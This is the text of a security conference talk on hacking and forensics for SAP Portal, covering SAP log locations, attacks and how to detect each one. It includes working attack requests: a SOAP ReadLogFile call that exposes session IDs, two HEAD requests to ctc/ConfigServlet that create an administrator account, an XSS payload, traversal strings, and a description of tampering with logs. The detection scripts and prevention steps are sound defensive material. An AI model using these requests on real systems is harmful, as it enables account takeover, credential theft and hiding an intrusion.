SAP Portal: Hacking and forensics
Invest in security to secure investments
SAP Portal: Hacking and forensics
Dmitry Chastukhin – Director of SAP pentest/research team
Evgeny Neyolov – Security analyst, (anti)forensics research
ERPScan
Leading SAP AG partner in the field of discovering security vulnerabilities, by the number of vulnerabilities found
• Developing software for SAP security monitoring
• Talks at 35+ security conferences worldwide: BlackHat(US/EU/DC/UAE), RSA, Defcon, CONFidence, HITB, etc.
• First to develop software for NetWeaver J2EE assessment
• The only solution to assess all areas of SAP Security
• Research team with experience in different areas of security, from ERP and web security to mobile, embedded devices, and critical infrastructure, accumulating their knowledge on SAP research.
erpscan.com ERPScan — invest in security to secure investments
Dmitry Chastukhin
Business application security expert
Yet another security researcher
Agenda
• SAP security
• SAP forensics WTF?!
• Say hello to SAP Portal
• Breaking SAP Portal
• Catch me if you can
• Conclusion
SAP
• The most popular business application
• More than 180000 customers worldwide
• More than 70% of Forbes 500 run SAP
• More than 40% of ERP market in Poland
SAP security
Espionage
– Stealing financial information
– Stealing corporate secrets
– Stealing supplier and customer lists
– Stealing HR data
Fraud
– False transactions
– Modification of master data
Sabotage
– Denial of service
– Modification of financial reports
– Access to technology network (SCADA) by trust relations
[Chart: number of SAP security talks per year at security conferences, 2003–2013]
SAP security
• BlackHat
• Defcon
• HITB
• RSA
• CONFidence
• DeepSec
• Hacktivity
• Troopers
• Source
Source: SAP Security in Figures 2013
How easy? SAP Security Notes
• More than 2600 in total
Is it remotely exploitable?
• > 5000 non-web SAP services exposed in the world, including Dispatcher, Message Server, SapHostControl, etc.
sapscan.com
What about other services?
[Chart: number of exposed SAP services worldwide, by service: SAP Dispatcher, SAP MMC, SAP Message Server, SAP HostControl, SAP ITS Agate, SAP Message Server httpd]
What about unpublished threats?
• Companies are not interested in publishing information about their breaches
• There are a lot of internal breaches thanks to unnecessarily given authorizations (An employee by mistake buys hundreds of excavators instead of ten)
• There are known stories about backdoors left by developers in custom ABAP code
• How can you be sure that, if a breach occurs, you can find evidence?
If there are no attacks, it doesn’t mean anything
• Companies don’t like to share it
• Only ~10% of companies use the security audit
• Even if it is used, nobody manages it (~5%)
• Even if it is managed, there is no correlation (~1%)
SAP Forensics
Typical SAP audit options*
• ICM log (icm/HTTP/logging_0): 70%
• Security audit log in ABAP: 10%
• Table access logging (rec/client): 4%
• Message Server log (ms/audit): 2%
• SAP Gateway access log: 2%
* The percentage of companies is based on our security assessments and product implementations.
What do we see?
• A lot of research
• Real attacks
• Lack of logging practice
• Many vulnerabilities are hard to close → We need to monitor them, at least
What do we need to monitor? External attacks on SAP
Attack users and SAP GUI
SAP Portal and WEB
Exposed SAP services
SAProuter
* Ideally, we should control everything, but this talk has limits, so let’s focus on the most critical areas.
Awareness
Secure configuration and patch management
Disable them
• Too many issues and custom configuration
• Can be 0-days
• Need to concentrate on this area
Say hello to Portal
• Point of web access to SAP systems
• Point of web access to other corporate systems
• Way for attackers to get access to SAP from the Internet
EP architecture
Okay, okay. SAP Portal is important, and it has many links to other modules.
So what?
SAP Logging
“If you are running an ABAP + Java installation of Web AS with SAP Web Dispatcher as a load balancing solution, you can safely disable logging of HTTP requests and responses on J2EE Engine, and use the corresponding CLF logs of SAP Web Dispatcher. This also improves the HTTP communication performance. The only drawback of using the Web Dispatcher’s CLF logs is that no information is available about the user executing the request (since the user is not authenticated on the Web Dispatcher, but on the J2EE Engine instead).”
Source: SAP Help
* Not the only drawback: there are many complex attacks that use POST requests.
SAP J2EE Logging
• Categories of system event recording:
– System – all system-related security and administrative logs
– Applications – all system events related to business logic
– Performance – reserved for single activity tracing
• Default location of these files in your file system: \usr\sap\<sid>\<id>\j2ee\cluster\<node>\log\
SAP J2EE Logging
• Developer trace files of the Java instance: <SID>\<instance name>\work
• Developer trace files of the central services: <SID>\<instance name>\work and <SID>\<instance name>\log
• Java server logs: <SID>\<instance name>\j2ee\cluster\server<n>\log
Full logging is not always the best option
SAP Management Console
SAP Management Console
• SAP MMC: centralized system management
• SAP MMC has remote commands
• Commands are simple SOAP requests
• They allow viewing trace and log messages
• It’s not bad if you only use it sometimes and delete logs after use, but…
SAP Management Console
What can we find in logs?
Right! The file userinterface.log contains the calculated JSESSIONID.
But… the attacker must have credentials to read the log file.
WRONG!
SAP Management Console
<?xml version="1.0"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
                   xmlns:xs="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Header>
    <sapsess:Session xmlns:sapsess="http://www.sap.com/webas/630/soap/features/session/">
      <enableSession>true</enableSession>
    </sapsess:Session>
  </SOAP-ENV:Header>
  <SOAP-ENV:Body>
    <ns1:ReadLogFile xmlns:ns1="urn:SAPControl">
      <filename>j2ee/cluster/server0/log/system/userinterface.log</filename>
      <filter/>
      <language/>
      <maxentries>%COUNT%</maxentries>
      <statecookie>EOF</statecookie>
    </ns1:ReadLogFile>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
Prevention
Source: SAP Help
• Don’t use TRACE_LEVEL = 3
• Delete traces when work is finished
• Limit access to dangerous methods
• Install notes 927637 and 1439348
• Mask security-sensitive data in HTTP access log
Prevention
Source: SAP Help
• The HTTP Provider service can mask security-sensitive URL parameters, cookies, or headers
• By default, only the items listed below are masked:
– Path parameter: jsessionid
– Request parameters: j_password, j_username, j_sap_password, j_sap_again, oldPassword, confirmNewPassword, ticket
– HTTP headers: Authorization, Cookie (JSESSIONID, MYSAPSSO2)
SAP NetWeaver J2EE
Access Control
• Web Dynpro - programmatic
• Portal iViews - programmatic
• J2EE Web apps - declarative
Programmatic: by UME
Declarative: by web.xml
Access Control
• The central entity in the J2EE authorization model is the security role
• Programmers define the application-specific roles in the J2EE deployment descriptor
Descriptors: web.xml, web-j2ee-engine.xml
web.xml:
    <servlet>
        <servlet-name>CriticalAction</servlet-name>
        <servlet-class>com.sap.admin.Critical.Action</servlet-class>
    </servlet>
    <servlet-mapping>
        <servlet-name>CriticalAction</servlet-name>
        <url-pattern>/admin/critical</url-pattern>
    </servlet-mapping>
    <security-constraint>
        <web-resource-collection>
            <web-resource-name>Restrictedaccess</web-resource-name>
            <url-pattern>/admin/*</url-pattern>
            <http-method>GET</http-method>
        </web-resource-collection>
        <auth-constraint>
            <role-name>administrator</role-name>
        </auth-constraint>
    </security-constraint>
Verb Tampering
Verb Tampering
• If we try to access the application using GET, we need a login:password and the administrator role
• What if we try to access the application using HEAD instead of GET?
• PROFIT!
• Did U know about ctc?
Verb Tampering
Need an admin account in SAP Portal? Just send two HEAD requests.
• Create new user CONF:idence
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence
• Add the user CONF to the group Administrators
HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;ADD_USER_TO_GROUP;USERNAME=CONF,GROUPNAME=Administrators
* Works when UME uses the Java database.
Prevention
• Install SAP notes 1503579, 1616259, 1589525, 1624450
• Install other SAP notes about Verb Tampering
• Scan applications with the ERPScan WEB.XML checker
• Disable the applications that are not necessary
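As an added example (not ERPScan's WEB.XML checker and not SAP code), the Python below applies the verb-tampering rule from the slides to a constructed web.xml: a <security-constraint> that lists explicit <http-method> elements protects only those verbs, so every such constraint is reported. The harden() helper goes further than the corrected descriptor on the slides, which adds HEAD next to GET: it removes the method list entirely so the constraint covers every verb.

```python
"""Flag web.xml security constraints that are open to HTTP verb tampering."""
import xml.etree.ElementTree as ET

# Constructed sample modelled on the slide's web.xml: the constraint on
# /admin/* names only GET, so HEAD (and POST, PUT, ...) are not covered.
SAMPLE_WEB_XML = """<web-app>
  <servlet>
    <servlet-name>CriticalAction</servlet-name>
    <servlet-class>com.sap.admin.Critical.Action</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>CriticalAction</servlet-name>
    <url-pattern>/admin/critical</url-pattern>
  </servlet-mapping>
  <security-constraint>
    <web-resource-collection>
      <web-resource-name>Restrictedaccess</web-resource-name>
      <url-pattern>/admin/*</url-pattern>
      <http-method>GET</http-method>
    </web-resource-collection>
    <auth-constraint>
      <role-name>administrator</role-name>
    </auth-constraint>
  </security-constraint>
</web-app>
"""


def _local(tag):
    """Strip a namespace prefix such as {http://java.sun.com/xml/ns/j2ee}."""
    return tag.rsplit("}", 1)[-1]


def find_verb_tampering(web_xml_text):
    """Return one finding per constraint whose method list is explicit.

    Each finding is (url_patterns, listed_methods, roles).  A constraint
    without <http-method> applies to every verb and is not reported.
    """
    root = ET.fromstring(web_xml_text)
    findings = []
    for sc in root.iter():
        if _local(sc.tag) != "security-constraint":
            continue
        patterns, methods, roles = [], [], []
        for el in sc.iter():
            name = _local(el.tag)
            text = (el.text or "").strip()
            if name == "url-pattern":
                patterns.append(text)
            elif name == "http-method":
                methods.append(text.upper())
            elif name == "role-name":
                roles.append(text)
        if methods:
            findings.append((patterns, methods, roles))
    return findings


def harden(web_xml_text):
    """Return the descriptor with every <http-method> removed, so each
    constraint covers all verbs (stricter than adding HEAD beside GET)."""
    root = ET.fromstring(web_xml_text)
    for wrc in root.iter():
        if _local(wrc.tag) != "web-resource-collection":
            continue
        for hm in [c for c in wrc if _local(c.tag) == "http-method"]:
            wrc.remove(hm)
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for patterns, methods, roles in find_verb_tampering(SAMPLE_WEB_XML):
        print(f"{patterns}: only {methods} require {roles}; other verbs are open")
    print("after hardening:", find_verb_tampering(harden(SAMPLE_WEB_XML)))
```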
Investigation
j2ee\cluster\<node>\log\system\httpaccess\responses.trc:
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet?param=com.sap.ctc.util.UserConfig;CREATEUSER;USERNAME=CONF,PASSWORD=idence HTTP/1.0 200 0
web.xml:
    <servlet><servlet-name>CriticalAction</servlet-name>
        <servlet-class>com.sap.admin.Critical.Action</servlet-class></servlet>
    <servlet-mapping><servlet-name>CriticalAction</servlet-name>
        <url-pattern>/admin/critical</url-pattern></servlet-mapping>
    <security-constraint>
        <web-resource-collection>
            <web-resource-name>Restrictedaccess</web-resource-name>
            <url-pattern>/admin/*</url-pattern>
            <http-method>GET</http-method><http-method>HEAD</http-method>
        </web-resource-collection>
        <auth-constraint><role-name>administrator</role-name></auth-constraint>
    </security-constraint>
GET /admin/critical/CriticalAction
GET /servlet/com.sap.admin.Critical.Action
Invoker servlet
Invoker Servlet
• Want to execute an OS command on J2EE server remotely?
• Maybe upload a backdoor in a Java class?
• Or sniff all traffic?
Still remember ctc?
Invoker Servlet
Prevention
• Update to the latest patches: SAP notes 1467771, 1445998
• “EnableInvokerServletGlobally” must be “false”
• Check all WEB.XML files with the ERPScan WEBXML checker
Investigation
#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear#com.sap.security.core.util.SecurityAudit#Guest#0#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#
#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#
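As an added example (not SAP or ERPScan code), the Python below parses the two '#'-delimited audit records above and flags a user creation performed by the Guest principal, which is the trace the HEAD-based ctc/ConfigServlet call leaves in the audit log. The field positions used (severity, message kind, message template and its arguments) are inferred from these two records only, not from SAP documentation, so treat them as an assumption.

```python
"""Parse NetWeaver Java audit records in '#'-delimited list format and
flag USER.CREATE events performed as Guest."""
from datetime import datetime, timezone

# The two records from the slide, each on one line.
SAMPLE_AUDIT = (
    "#1.5#000C29C2603300790000003A000008700004D974E7CCC6D8#1364996035203"
    "#/System/Security/Audit#sap.com/tc~lm~ctc~util~basic_ear"
    "#com.sap.security.core.util.SecurityAudit#Guest#0"
    "#SAP J2EE Engine JTA Transaction : [024423a006e18]#n/a##217c5d309c6311e29bca000c29c26033"
    "#SAPEngine_Application_Thread[impl:3]_22##0#0#Info#1"
    "#com.sap.security.core.util.SecurityAudit#Plain###Guest | USER.CREATE | "
    "USER.PRIVATE_DATASOURCE.un:CONF | | SET_ATTRIBUTE: uniquename=[CONF]#\n"
    "#1.5#000C29C2603300680002C97A000008700004D974E8354D1D#1364996042062"
    "#/System/Security/Audit/J2EE#sap.com/irj#com.sap.engine.services.security.roles.audit"
    "#Guest#182818##n/a##0c5bfef08bc511e287e6000c29c26033"
    "#Thread[Thread-50,5,SAPEngine_Application_Thread[impl:3]_Group]##0#0#Info#1"
    "#com.sap.engine.services.security.roles.audit#Java###{0}: Authorization check for "
    "caller assignment to J2EE security role [{1} : {2}].#3#ACCESS.OK#SAP-J2EE-Engine#guests#\n"
)


def parse_record(line):
    """Split one record on '#'.  Field positions are an assumption derived
    from the slide: 3 = epoch ms, 4 = category, 5 = application,
    6 = location, 7 = user, 17 = severity, 20 = kind, 23 = message.
    For kind 'Java' the message is a template followed by an argument
    count and the arguments, which are substituted here."""
    f = line.rstrip("\n").split("#")
    if len(f) < 24 or f[1] != "1.5":
        raise ValueError("not a list-format record")
    ms = int(f[3])
    when = datetime.fromtimestamp(ms // 1000, tz=timezone.utc)
    when = when.replace(microsecond=(ms % 1000) * 1000)
    message = f[23]
    if f[20] == "Java":
        argc = int(f[24])
        for i, arg in enumerate(f[25:25 + argc]):
            message = message.replace("{%d}" % i, arg)
    return {"time": when, "category": f[4], "application": f[5],
            "location": f[6], "user": f[7], "severity": f[17],
            "message": message}


def parse_audit(text):
    """Parse every line that starts a record; other lines are ignored."""
    return [parse_record(line) for line in text.splitlines()
            if line.startswith("#1.5#")]


def guest_user_creations(text):
    """Records where an unauthenticated (Guest) caller created a user."""
    return [r for r in parse_audit(text)
            if r["user"] == "Guest" and "USER.CREATE" in r["message"]]


if __name__ == "__main__":
    for r in parse_audit(SAMPLE_AUDIT):
        print(r["time"].isoformat(), r["user"], r["severity"], r["message"])
    print("guest user creations:", len(guest_user_creations(SAMPLE_AUDIT)))
```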
Investigation
XSS
• Many XSSs in Portal
• But sometimes HttpOnly
• But when we exploit XSS, we can use the features of SAP Portal
EPCF
• EPCF provides a JavaScript API designed for the client-side communication between portal components and the portal core framework
• Enterprise Portal Client Manager (EPCM)
• iViews can access the EPCM object from every portal page or IFrame
• Every iView contains the EPCM object:
    <SCRIPT>
    alert(EPCM.loadClientData("urn:com.sap.myObjects", "person"));
    </SCRIPT>
For example, EPCF is used as a transient user data buffer for iViews
Prevention
• Install SAP note 1656549
j2ee\cluster\<node>\log\system\httpaccess\responses.trc:
#Plain###192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968#
Investigation
Web Dynpro Java
• Web Dynpro unauthorized modifications
• For example:
– somebody steals an account using XSS/CSRF/sniffing
– then tries to modify the severity level of logs
Web Dynpro JAVA
Source: SAP Help
• No traces of the change in the default log files: \cluster\server0\log\system\httpaccess\responses.log
• Web Dynpro sends all data by POST, and we only see GET URLs in responses.log
• But sometimes we can find information by indirect signs:
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
• The client loaded images from the server during some changes
Investigation
Investigation
• Most actions have icons
• They have to be loaded from the server
• Usually, legitimate users have them all in cache
• Attackers usually don’t have them, so they make requests to the server
• That’s how we can identify potentially malicious actions
• But there should be correlation with a real user’s activity
• False positives are possible:
– New legitimate user
– Old user clears cache
– Other
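As an added example (not ERPScan tooling), the Python below parses responses.trc lines in the format shown on the Investigation slides for verb tampering, XSS and Web Dynpro, and applies the three indirect signs discussed there: a HEAD that succeeds where GET was refused, script tags inside a request URL, and admin-UI icon fetches from a client that has no other activity to correlate with. The log lines are constructed after the slides' excerpts, and the "webadmin" path marker used to recognise admin Web Dynpro components is an assumption.

```python
"""Triage a NetWeaver httpaccess responses.trc for three indirect signs:
verb tampering, reflected XSS payloads and uncached admin-icon fetches."""
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample in the "[date] - ip : METHOD url HTTP/x.y status size"
# form the slides show; the first four lines mirror the slide excerpts.
SAMPLE_TRC = """\
[Apr 3, 2013 1:23:59 AM ] - 192.168.192.14 : GET /ctc/ConfigServlet HTTP/1.1 401 1790
[Apr 3, 2013 1:30:01 AM ] - 192.168.192.14 : HEAD /ctc/ConfigServlet HTTP/1.1 200 0
[Apr 3, 2013 1:31:07 AM ] - 192.168.192.26 : GET /irj/servlet/prt/portal/prtroot/com.sap.portal.usermanagement.admin.UserMapping?systemid=MS_EXCHANGEaaaa%3C/script%3E%3Cscript%3Ealert(%27xSS%27)%3C/script%3E HTTP/1.1 200 3968
[Apr 3, 2013 9:35:49 AM ] - 172.16.0.63 : GET /webdynpro/resources/sap.com/tc~lm~webadmin~log_config~wd/Components/com.sap.tc.log_configurator.LogConfigurator/warning.gif HTTP/1.1 200 110
[Apr 3, 2013 9:40:12 AM ] - 10.0.0.5 : GET /irj/portal HTTP/1.1 200 8123
"""

LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+?)\s*\]\s*-\s*(?P<ip>\S+)\s*:\s*(?P<method>[A-Z]+)\s+"
    r"(?P<url>\S+)\s+HTTP/\d\.\d\s+(?P<status>\d{3})\s+(?P<size>\d+)"
)
ICON_SUFFIXES = (".gif", ".png")


def parse_trc(text):
    """Return one dict per well-formed access line; other lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            rec["path"] = rec["url"].split("?", 1)[0]
            records.append(rec)
    return records


def find_indicators(text):
    """Return (rule, client_ip, url) tuples in log order."""
    records = parse_trc(text)
    # Non-icon requests per client: a client whose only traffic is admin
    # icons has no legitimate session activity to correlate with.
    real_activity = Counter(r["ip"] for r in records
                            if not r["path"].lower().endswith(ICON_SUFFIXES))
    denied = set()  # (ip, path) pairs refused with 401 on GET so far
    hits = []
    for r in records:
        key = (r["ip"], r["path"])
        if r["method"] == "GET" and r["status"] == 401:
            denied.add(key)
        elif r["method"] != "GET" and r["status"] == 200 and key in denied:
            hits.append(("verb-tampering", r["ip"], r["url"]))
        if "<script" in unquote(r["url"]).lower():
            hits.append(("xss-payload", r["ip"], r["url"]))
        # "webadmin" is an assumed marker for admin Web Dynpro components,
        # taken from the log_config path on the slide.
        if ("webadmin" in r["path"] and r["path"].lower().endswith(ICON_SUFFIXES)
                and real_activity[r["ip"]] == 0):
            hits.append(("admin-icon-without-session", r["ip"], r["url"]))
    return hits


if __name__ == "__main__":
    for rule, ip, url in find_indicators(SAMPLE_TRC):
        print(f"{rule:28} {ip:16} {url[:70]}")
```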
Directory traversal
FIX
Directory traversal fix bypass
Prevention
• Install SAP note 1630293
Investigation
/../
!252f..!252f
Breaking SAP Portal
• Found a file in the OS of SAP Portal with the encrypted passwords for administration and DB
• Found a file in the OS of SAP Portal with keys to decrypt passwords
• Found a vulnerability (another one ;)) which allows reading the files with passwords and keys
• Decrypt passwords and log into Portal
• PROFIT!
Read the file
How can we read the file?
• Directory Traversal
• OS Command execution
• XML External Entity (XXE)
XXE in Portal: Details
• Injection of malicious requests into XML packets
• Can lead to unauthorized file read, DoS, SSRF
• There is an XXE vulnerability in SAP Portal
• Can be exploited by modification of POST request
• It is possible to read any file from OS and much more
XXE in Portal
XXE in Portal
XXE
Error based XXE
XXE in Portal: Result
• We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database user SAP<SID>DB; its password is here:
\usr\sap\<SID>\SYS\global\security\data\SecStore.properties
Where are the passwords? (config.properties)
rdbms.maximum_connections=5
system.name=TTT
secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
secstorefs.secfile=/oracle/TTT/sapmnt/global/security/data/SecStore.properties
secstorefs.lib=/oracle/TTTsapmnt/global/security/lib
rdbms.driverLocation=/oracle/client/10x_64/instantclient/ojdbc14.jar
rdbms.connection=jdbc/pool/TTT
rdbms.initial_connections=1
SecStore.properties
$internal/version=Ni4zFF4wMSeaseforCCMxegAfx
admin/host/TTT=7KJuOPPs/+u+14jM7uy7cy7exrZuYvevkSrPxwueur2445yxgBS
admin/password/TTT=7KJuOPPs/+uv+14j56vDc7M7v7dytbGbkgqDp+QD04b0Fh
jdbc/pool/TTT=7KJuOPPs/+u5jM6s1cvvgQ1gzFvarxuUzEJTHTJI0VGegH
admin/port/TTT=7KJuOPPs/+u+1j4vD1cv6ZTvd336rzEd7267Rwr4ZUgRTQ
$internal/check=BJRrzfjeUA+bw4XCzdz16zX78ufbt
$internal/mode=encrypted
admin/user/TTT=7KJuOPPs/+u+14j6s14sTxXU3ONl3rL6N7yssV75eC6/5S3E
But where is the key?
config.properties: secstorefs.keyfile=/oracle/TTT/sapmnt/global/security/data/SecStore.key
Get the password
• We have an encrypted password
• We have a key to decrypt it
We got the J2EE admin and JDBC login:password!
Prevention
• Install SAP note 1619539
• Restrict read access to the files SecStore.properties and SecStore.key
Investigation
POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fadministrator!2fsuper_admin!2fsuper_admin_role!2fcom.sap.portal.content_administration!2fcom.sap.portal.content_admin_ws!2fcom.sap.km.AdminContent!2fcom.sap.km.AdminContentExplorer!2fcom.sap.km.AdminExplorer/ HTTP/1.1
Investigation
• The only way to get HTTP POST request values is to enable HTTP Trace
• Visual Administrator → Dispatcher → HTTP Provider → Properties: HttpTrace = enable
• For 6.4 and 7.0 SP12 and lower:
– On Dispatcher: /j2ee/cluster/dispatcher/log/defaultTrace.trc
– On Server: \j2ee\cluster\server0\log\system\httpaccess\responses.0.trc
• For 7.0 SP13 and higher: /j2ee/cluster/dispatcher/log/services/http/req_resp.trc
• Manually analyze all requests for XXE attacks
Malicious file upload: Attack
• Knowledge Management allows uploading different types of files, which can store malicious content, to the server
• Sometimes, if guest access is allowed, it is possible to upload any file without being an authenticated user
• For example, it can be an HTML file with JavaScript that steals cookies
Malicious file upload: Attack
Malicious file upload: Attack
Malicious file upload: Forensics
[Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 : POST /irj/servlet/prt/portal/prteventname/HtmlbEvent/prtroot/pcd!3aportal_content!2fspecialist!2fcontentmanager!2fContentManager!2fcom.sap.km.ContentManager!2fcom.sap.km.ContentExplorer!2fcom.sap.km.ContentDocExplorer!2fcom.sap.km.DocsExplorer/documents HTTP/1.1 200 13968
[Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 : GET /irj/go/km/docs/etc/public/mimes/images/html.gif HTTP/1.1 200 165
* Again, images can help us.
Malicious file upload: Prevention
Enable File Extension and Size Filter:
• System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → File Extension and Size Filter
• Select either the All repositories parameter or at least one repository from the repository list in the Repositories parameter
Malicious file upload: Prevention
Enable Malicious Script Filter:
• System Administration → System Configuration → Content Management → Repository → Filters → Show Advanced Options → Malicious Script Filter
• The filter also detects executable scripts in files that are being modified and encodes them when they are saved
– Enable Forbidden Scripts: a comma-separated list of banned script tags that will be encoded when the filter is applied
– Enable the Send E-Mail to Administrator option
Portal post-exploitation
• Lots of links to other systems in the corporate LAN
• Using SSRF, attackers can get access to these systems
What is SSRF?
SSRF History: Basics
• We send Packet A to Service A
• Service A initiates Packet B to Service B
• Services can be on the same or different hosts
• We can manipulate some fields of Packet B within Packet A
• Various SSRF attacks depend on how many fields of Packet B we can control
[Diagram: Packet A → Service A → Packet B → Service B]
Partial Remote SSRF: HTTP attacks on other services
[Diagram: a direct attack sends GET /vuln.jsp to HTTP server A; an SSRF attack sends the request to A, which relays GET /vuln.jsp to host B in the corporate network]
Gopher uri scheme
• Using the gopher:// URI scheme, it is possible to send TCP packets:
– Exploit OS vulnerabilities
– Exploit old SAP application vulnerabilities
– Bypass SAP security restrictions
– Exploit vulnerabilities in local services
More info in our BH2012 presentation: SSRF vs. Business Critical Applications
Portal post-exploitation
Anti-forensics
Anti-forensics
• Flooding
• Deleting
• Changing
Anti-forensics
Log flooding
• 5 active logs
• Maximum log file size is 10 MB
• Archiving happens when all logs reach the maximum size
• When file.0.log reaches the maximum size, file.1.log is opened
• When file.4.log reaches the maximum size, all files are zipped and backed up
• The same files are rewritten after archiving
Anti-forensics
Log deleting
• SAP locks write access only on the single active log
• SAP allows reading/writing the other logs, so it is possible to delete them
• Deleting them could give away the attacker’s presence
Log changing
• SAP locks write access only on the one active log
• It is possible to write into any other log file
Securing SAP Portal
• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• Additional place for log storage
• Monitoring of security events:
– Own scripts, parse common patterns
– ERPScan has all existing web vulns/0-day patterns
Conclusion
It is possible to protect yourself from these kinds of issues, and we are working closely with SAP to keep customers secure.
SAP Guides
It’s all in your hands:
• Regular security assessments
• ABAP code review
• Monitoring technical security
• Segregation of Duties
• Security events monitoring
Future work
I'd like to thank SAP's Product Security Response Team for the great cooperation to make SAP systems more secure. Research is always ongoing, and we can't share all of it today. If you want to be the first to see new attacks and demos, follow us at @erpscan and attend future presentations:
• July 31 – BlackHat (Las Vegas, USA)
Web: www.erpscan.com
E-mail: [email protected]
Twitter: @erpscan, @_chipik, @neyolov